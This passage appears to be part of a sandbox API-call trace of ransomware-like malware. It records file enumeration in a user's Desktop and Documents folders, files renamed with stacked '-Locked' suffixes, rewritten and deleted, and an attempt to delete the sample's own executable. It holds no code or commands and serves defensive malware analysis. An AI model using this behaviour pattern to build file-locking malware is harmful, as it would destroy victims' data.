FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287204a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287204a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287204a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked", cAlternateFileName="NRKT5N~2.WAV")) returned 1 [0305.377] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3642edd9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3642edd9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3642edd9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked", cAlternateFileName="NRKT5N~1.WAV")) returned 1 [0305.377] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287d036, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287d036, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287d036, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked", cAlternateFileName="OQWYTP~1.BMP")) returned 1 [0305.377] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364363bc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364363bc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364363bc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked-Locked", cAlternateFileName="OQWYTP~2.BMP")) returned 1 [0305.378] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3288a749, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3288a749, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3288a749, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked", cAlternateFileName="SKBR_O~2.PPT")) returned 1 [0305.408] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364439d9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364439d9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364439d9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked-Locked", cAlternateFileName="SKBR_O~1.PPT")) returned 1 [0305.409] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32896a80, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32896a80, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32896a80, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked", cAlternateFileName="SONI~1.JPG")) returned 1 [0305.409] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3644aec5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3644aec5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3644aec5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked-Locked", cAlternateFileName="SONI~2.JPG")) returned 1 [0305.409] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328add42, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328add42, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328add42, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked", cAlternateFileName="STLRGM~1.FLV")) returned 1 [0305.410] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36452403, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36452403, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36452403, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked-Locked", cAlternateFileName="STLRGM~2.FLV")) returned 1 [0305.410] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328c165b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328c165b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328c165b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked", cAlternateFileName="TMHBBP~1.MP4")) returned 1 [0305.410] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364598c3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364598c3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364598c3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked-Locked", cAlternateFileName="TMHBBP~2.MP4")) returned 1 [0305.411] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d28c0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328d28c0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328d28c0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked", cAlternateFileName="TUJLYX~2.MP4")) returned 1 [0305.411] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3645fa98, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3645fa98, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3645fa98, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked-Locked", cAlternateFileName="TUJLYX~1.MP4")) returned 1 [0305.411] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328e38e5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328e38e5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328e38e5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked", cAlternateFileName="V0ZO8W~2.JPG")) returned 1 [0305.411] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364649d0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364649d0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364649d0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked", cAlternateFileName="V0ZO8W~1.JPG")) returned 1 [0305.412] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f37f9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328f37f9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328f37f9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked", cAlternateFileName="VL-8WX~1.PNG")) returned 1 [0305.412] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36476736, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36476736, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36476736, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked-Locked", cAlternateFileName="VL-8WX~2.PNG")) returned 1 [0305.412] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329021a3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329021a3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329021a3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked", cAlternateFileName="WJV4VO~2.GIF")) returned 1 [0305.413] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3647dc3b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3647dc3b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3647dc3b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked-Locked", cAlternateFileName="WJV4VO~1.GIF")) returned 1 [0305.413] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32913273, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32913273, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32913273, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 1 [0305.413] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36485145, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked-Locked", cAlternateFileName="Y4HQQH~1.PDF")) returned 1 [0305.413] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36485145, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked-Locked", cAlternateFileName="Y4HQQH~1.PDF")) returned 0 [0305.414] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0305.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0305.414] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x54 [0305.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.414] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked-locked-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.415] GetFileType (hFile=0x49c) returned 0x1 [0305.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.415] GetFileType (hFile=0x49c) returned 0x1 [0305.417] CloseHandle (hObject=0x49c) returned 1 [0305.418] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4d [0305.418] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked-locked-locked-locked-locked")) returned 1 [0305.419] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x59 [0305.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.419] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv-locked-locked-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.419] GetFileType (hFile=0x49c) returned 0x1 [0305.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.420] GetFileType (hFile=0x49c) returned 0x1 [0305.422] CloseHandle (hObject=0x49c) returned 1 [0305.423] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x52 [0305.423] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv-locked-locked-locked-locked-locked")) returned 1 [0305.424] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", lpFilePart=0x0) returned 0x69 [0305.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.424] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.424] GetFileType (hFile=0x49c) returned 0x1 [0305.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.424] GetFileType (hFile=0x49c) returned 0x1 [0305.426] CloseHandle (hObject=0x49c) returned 1 [0305.427] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", lpFilePart=0x0) returned 0x62 [0305.427] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe")) returned 0 [0305.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0305.431] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0305.431] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpFilePart=0x0) returned 0x20 [0305.431] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34ae49d9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34ae49d9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.431] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34ae49d9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34ae49d9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.432] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3483cb73, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3483cb73, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3483cb73, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FEg.xlsx-Locked-Locked-Locked", cAlternateFileName="1FEG~2.XLS")) returned 1 [0305.434] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3484b4e7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3484b4e7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3484b4e7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XKT2 -erD.pptx-Locked-Locked-Locked", cAlternateFileName="2XKT2-~2.PPT")) returned 1 [0305.435] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3485b34a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3485b34a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3485b34a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4 yebkiYbIGx.xlsx-Locked-Locked-Locked", cAlternateFileName="4YEBKI~2.XLS")) returned 1 [0305.435] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34869e2c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34869e2c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34869e2c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4GH0Y9.pdf-Locked-Locked-Locked", cAlternateFileName="4GH0Y9~1.PDF")) returned 1 [0305.435] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34879b1b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34879b1b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34879b1b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="88Z1o5.docx-Locked-Locked-Locked", cAlternateFileName="88Z1O5~2.DOC")) returned 1 [0305.435] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34898402, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34898402, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34898402, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9wui5eVHXPKhOlhGPv40.docx-Locked-Locked-Locked", cAlternateFileName="9WUI5E~2.DOC")) returned 1 [0305.435] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348abc94, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x348abc94, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x348abc94, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="awNrFZy3e3qK1nkjdW.pptx-Locked-Locked-Locked", cAlternateFileName="AWNRFZ~2.PPT")) returned 1 [0305.436] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348ba65f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x348ba65f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x348ba65f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="azYkAGkUGGsOX2bnL.rtf-Locked-Locked-Locked", cAlternateFileName="AZYKAG~2.RTF")) returned 1 [0305.436] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348ccb5f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x348ccb5f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x348ccb5f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bf c.docx-Locked-Locked-Locked", cAlternateFileName="BFC~2.DOC")) returned 1 [0305.436] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348dca5e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x348dca5e, 